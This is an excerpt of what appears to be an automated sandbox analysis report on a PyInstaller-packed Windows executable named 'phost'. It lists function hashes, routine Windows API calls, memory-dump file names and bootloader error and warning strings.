                                                                                                                                                                                                                              • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                              • Instruction ID: f7066f966b33c59090be11c9848da9ef106e25ef8a964541b0c85e258afc640f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42419331B18A87D1EE11EB28EC141F96379FB443A4F804132EA5C8B695EF3CE519D742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62CC7351A,?,00000000,00007FF62CC73F23), ref: 00007FF62CC72AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction ID: d3fef1ce9e8897e817482edb9f20a3440b9c169b6a742ec5d47762344a60bddb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27219132B18B8192EA209B55FC517E663A8FB887E4F404132EE8C97659DF3CD1498741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                              • Instruction ID: 1d315683a2c392e995dd6d41bc2069bde32595b1700e460346a4bee434b6e2be
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E214C30F0C65645FE6A67695E6593F51725F847F0F044738D93EC6AD6DE2CA4428303
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction ID: 1b20762d8290de707d8bfdaacb36347c4d0dda70141b01bee13fbbf1d4457005
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B117231B18A4186EB608B5AAC6433972B0FB88BF8F004234D95DC7794DF7CD8148742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78592
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC785E9
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC79400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62CC745E4,00000000,00007FF62CC71985), ref: 00007FF62CC79439
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78678
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC786E4
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC786F5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC7870A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                              • Instruction ID: 14c4aed2e1edbb137f0b8f72aa0ff2fcdbd1536768575b5cb22cfd846b2f31ee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2419322B1868241EE709B19A9406BA63B8FF84BE4F440135EF4DEBB89DE3CD445D702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B347
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B37D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B3AA
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B3BB
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B3CC
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B3E7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                              • Instruction ID: fe188e48bb0b2414946d9aedb3bc120f4bc6d9f62631fcf83e1756dacab17898
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5115C30B0C69286FE5667295EA593E61725F847F0F048734EA7EC67D6DE2CA4028303
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62CC71B6A), ref: 00007FF62CC7295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                              • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction ID: bb1576f88803f31ef1732537805a7460079237122d8620a9963275537cd811d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC31F633B18A8152EB209769AC506F762A5FF887E8F404132EE8DD7759EF3CD54A8301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                              • Instruction ID: 026af94ca820d1846e4d2910c61c247d5467c3c1d64e7b7c7aec636879526f17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C315F72708A8289EF20DF29EC556FA6360FF88798F444135EA4D8BB49DF3CD1458702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62CC7918F,?,00007FF62CC73C55), ref: 00007FF62CC72BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62CC72C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction ID: 8e3ad889dfa7d18dc07bcfbf825d2b5b5390444d5c318433017314033fd26951
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F21AE73B08B4192EB219B19F8947AA63A8FB887D4F404136EE8D97759DE3CD209C741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF62CC71B99), ref: 00007FF62CC72760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction ID: 1457340799cb50ff6dbfa9567e56d04423e5b2a8f7efdac5b2c88c96a9133c2a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A219F32B18B8192EA20DB59FC517E663A4FB883E4F404132EE8C97659DF3CD2498741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction ID: 5054d2157f2c649cbe9c89ca6660fe5e3700ffc0b555789b5d6817999129cd0e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F0AF71B19A0691EE248B28AC5973A5330AF84BB5F544235C66E865E8CF2CD444C302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: 35bef5cac66bbe2d7837c487f99ec243b5bf026781aae2c75bad09910fb4e982
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6114F62F5CA5301FF6E132CDC5637921646F5937CE08C634EA6E86AD6CE2DA981C107
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B41F
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B43E
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B466
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B477
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B488
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                              • Instruction ID: 82df2c030098c37c043c8bbc3591864a56ad55fd8824b363682cde47c25f1502
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20113A70F0C64245FE5AA72D5EA297B61625F847F0F488734E97EC6AD6DE2CA4028203
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                              • Instruction ID: 343d06dd44724ccdd77c97af3eaf179bb13f5ef5b94b0dbef03346bb8af9327c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09111870F0C24785FD6A666D5C6197B11624F453F0F444738DA3ECA2D3DE2DB4524253
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
